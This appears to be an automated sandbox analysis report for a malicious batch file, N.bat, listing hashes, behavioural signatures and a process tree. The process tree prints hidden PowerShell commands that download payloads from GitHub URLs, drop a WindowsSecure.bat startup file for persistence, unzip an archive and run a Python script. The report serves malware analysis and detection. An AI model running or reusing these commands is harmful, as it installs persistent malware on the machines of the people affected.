Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 11-05-2024 09:50
Static task: static1
Behavioral task: behavioral1
- Sample: N.bat
- Resource: win10-20240404-en
Behavioral task: behavioral2
- Sample: N.bat
- Resource: win7-20240215-en
Behavioral task: behavioral3
- Sample: N.bat
- Resource: win10v2004-20240508-en
General
- Target: N.bat
- Size: 28KB
- MD5: a32f8b613ddf66ea93311118d63bd110
- SHA1: fd19d211cf4b5feb8beaf5a41daca864ae6e02c6
- SHA256: 9fb8611f27b895e6d7a42435ea9b2fb13f18b2e9ccdb715ecf3281d75e3be0fb
- SHA512: e0372c6e8ee4a0ee2fede0f5579d84f1fd34db57fac0c203e53e4289980e58d53533deca29e637efb4a336003eb55e74ec192a175e8e008883b241d0ce005f03
- SSDEEP: 768:Wjj49w9xfoeRkPEE/Z4eFVohU24vN1UZ3t8XYDTZvQlhXNM47PGZYqU6Qa31lqHZ:IOZ4eFVohU24vNBORQlhXNM47Pq2L+ls
Malware Config
- Extracted: https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1
- Extracted: https://github.com/bao3125/ff/raw/main/Documen.zip
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes (flow | pid | process):
    5 | 3060 | powershell.exe
    6 | 3060 | powershell.exe
    8 | 2488 | powershell.exe
    9 | 2488 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
  Run Powershell and hide display window.
  Processes (pid | process):
    2488 | powershell.exe
    2464 | powershell.exe
    3008 | powershell.exe
    3060 | powershell.exe
- Drops startup file (1 IoC)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat | powershell.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid | process):
    3060 | powershell.exe
    2488 | powershell.exe
    2464 | powershell.exe
    3008 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 3060 | powershell.exe
    Token: SeDebugPrivilege | 2488 | powershell.exe
    Token: SeDebugPrivilege | 2464 | powershell.exe
    Token: SeDebugPrivilege | 3008 | powershell.exe
- Suspicious use of WriteProcessMemory (39 IoCs)
  Processes (description | pid | process | target process); the report logs each of the 13 rows below three times, giving the 39 entries:
    PID 2416 wrote to memory of 2296 | 2416 | cmd.exe | chcp.com
    PID 2416 wrote to memory of 1664 | 2416 | cmd.exe | find.exe
    PID 2416 wrote to memory of 1856 | 2416 | cmd.exe | findstr.exe
    PID 2416 wrote to memory of 2376 | 2416 | cmd.exe | findstr.exe
    PID 2416 wrote to memory of 2368 | 2416 | cmd.exe | findstr.exe
    PID 2416 wrote to memory of 1708 | 2416 | cmd.exe | findstr.exe
    PID 2416 wrote to memory of 2852 | 2416 | cmd.exe | cmd.exe
    PID 2416 wrote to memory of 1948 | 2416 | cmd.exe | find.exe
    PID 2416 wrote to memory of 2328 | 2416 | cmd.exe | cmd.exe
    PID 2416 wrote to memory of 3060 | 2416 | cmd.exe | powershell.exe
    PID 2416 wrote to memory of 2488 | 2416 | cmd.exe | powershell.exe
    PID 2416 wrote to memory of 2464 | 2416 | cmd.exe | powershell.exe
    PID 2416 wrote to memory of 3008 | 2416 | cmd.exe | powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 2416)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\N.bat"
  - Suspicious use of WriteProcessMemory
  Child processes:
    C:\Windows\system32\chcp.com (PID 2296)
      Command line: chcp.com 437
    C:\Windows\system32\find.exe (PID 1664)
      Command line: find
    C:\Windows\system32\findstr.exe (PID 1856)
      Command line: findstr /L /I set C:\Users\Admin\AppData\Local\Temp\N.bat
    C:\Windows\system32\findstr.exe (PID 2376)
      Command line: findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\N.bat
    C:\Windows\system32\findstr.exe (PID 2368)
      Command line: findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\N.bat
    C:\Windows\system32\findstr.exe (PID 1708)
      Command line: findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\N.bat
    C:\Windows\system32\cmd.exe (PID 2852)
      Command line: C:\Windows\system32\cmd.exe /c type tmp
    C:\Windows\system32\find.exe (PID 1948)
      Command line: find
    C:\Windows\system32\cmd.exe (PID 2328)
      Command line: C:\Windows\system32\cmd.exe /c type tmp
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3060)
      Command line: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2488)
      Command line: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/ff/raw/main/Documen.zip', 'C:\Users\Public\Document.zip')"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2464)
      Command line: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3008)
      Command line: powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmp
  Filesize: 14B
  MD5: ce585c6ba32ac17652d2345118536f9c
  SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
  SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
  SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1b5b4d82f6120ac012077a2748c487a4
  SHA1: 3a28e4991f7b2772b9c5d5f027bd54b5bd89a8ab
  SHA256: b5c5ebdb227c64ca85a3e280fc4d11be0fdb6f336637c1989a9a30d857235d8f
  SHA512: 58f58235eb2ae18c2a8d99137e75539af2b027da2ec16416a74ff488e4aabf9c70d7f6dfa6b5be848481dfce40ae2532730c6779ece16a28f0bfb5c80239a218
- memory/2488-17-0x000000001B690000-0x000000001B972000-memory.dmp
  Filesize: 2.9MB
- memory/2488-18-0x0000000001E80000-0x0000000001E88000-memory.dmp
  Filesize: 32KB
- memory/3060-8-0x0000000002BD0000-0x0000000002C50000-memory.dmp
  Filesize: 512KB
- memory/3060-9-0x000000001B570000-0x000000001B852000-memory.dmp
  Filesize: 2.9MB
- memory/3060-10-0x0000000002310000-0x0000000002318000-memory.dmp
  Filesize: 32KB
- memory/3060-11-0x0000000002BD0000-0x0000000002C50000-memory.dmp
  Filesize: 512KB